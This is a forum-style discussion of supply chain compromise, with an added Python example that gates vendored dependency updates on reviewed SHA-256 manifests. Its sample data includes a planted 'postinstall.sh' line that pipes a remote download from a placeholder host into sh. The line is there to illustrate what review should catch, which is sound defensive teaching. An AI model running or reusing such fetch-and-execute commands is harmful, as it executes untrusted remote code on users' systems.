>In any case, if the choice is “frequent supply chain compromise, take it or leave it”, the answer is of course “leave it”.
There's another choice: vendor your dependencies and manually review and vet updates. That solves all your problems: no need for "trusted third parties"; you are the one vetting it, so you only need to trust yourself.
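As an added illustration of the vendoring workflow that comment describes (this is example code written for this page, not code from any commenter or project), here is a minimal review gate: a manifest of SHA-256 digests for the vendored files is committed next to the code, and an update is accepted only after every added, removed or changed path has been explicitly signed off. The file names, contents and the `postinstall.sh` that appears in the update are constructed sample data; `digest_dir` is the same check against a real directory.

```python
"""Added example: a manifest-based review gate for vendored dependencies."""
import hashlib
from pathlib import Path

# Constructed sample data: the vendored tree as committed, and a candidate update.
OLD_TREE = {
    "lib/parse.py": b"def parse(x):\n    return x.strip()\n",
    "README.md": b"# lib\n",
}
NEW_TREE = {
    "lib/parse.py": b"def parse(x):\n    return x.strip().lower()\n",
    "README.md": b"# lib\n",
    # A file nobody asked for: exactly the kind of change the human review should catch.
    "postinstall.sh": b"curl https://example.invalid/x | sh\n",
}


def digest_tree(files):
    """Map relative path -> sha256 hex digest for an in-memory {path: bytes} tree."""
    return {path: hashlib.sha256(data).hexdigest() for path, data in sorted(files.items())}


def digest_dir(root):
    """Same as digest_tree, but for a real directory on disk (e.g. vendor/foo)."""
    root = Path(root)
    return {
        str(p.relative_to(root)): hashlib.sha256(p.read_bytes()).hexdigest()
        for p in sorted(root.rglob("*"))
        if p.is_file()
    }


def diff_manifest(old, new):
    """Return the added, removed and changed paths between two digest manifests."""
    added = sorted(p for p in new if p not in old)
    removed = sorted(p for p in old if p not in new)
    changed = sorted(p for p in new if p in old and old[p] != new[p])
    return {"added": added, "removed": removed, "changed": changed}


def accept_update(old, new, approved):
    """Accept the update only if every differing path was explicitly approved.

    `approved` is the set of paths the reviewer signed off on after reading the
    diff. Returns (accepted, unreviewed_paths); any unreviewed change rejects the
    update, so a file slipped into the release cannot pass silently.
    """
    d = diff_manifest(old, new)
    touched = set(d["added"]) | set(d["removed"]) | set(d["changed"])
    unreviewed = sorted(touched - set(approved))
    return (len(unreviewed) == 0, unreviewed)


OLD_MANIFEST = digest_tree(OLD_TREE)
NEW_MANIFEST = digest_tree(NEW_TREE)

if __name__ == "__main__":
    print("diff:", diff_manifest(OLD_MANIFEST, NEW_MANIFEST))
    # Reviewer only looked at the parser change; the dropped-in script is unreviewed.
    print("partial review:", accept_update(OLD_MANIFEST, NEW_MANIFEST, {"lib/parse.py"}))
    # After reading (and presumably rejecting or removing) postinstall.sh too:
    print("full review:", accept_update(OLD_MANIFEST, NEW_MANIFEST,
                                        {"lib/parse.py", "postinstall.sh"}))
```

In practice the manifest is what you commit alongside `vendor/`, and the "approved" set is whatever your review process records (a signed-off list in the update commit, for instance); the point is that the gate fails closed on anything the reviewer did not look at.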
You just turn a problem that a couple of thousand people have into a problem for a couple of million.
Fixing it early so the user does not have to deal with the complexity is most often the best approach.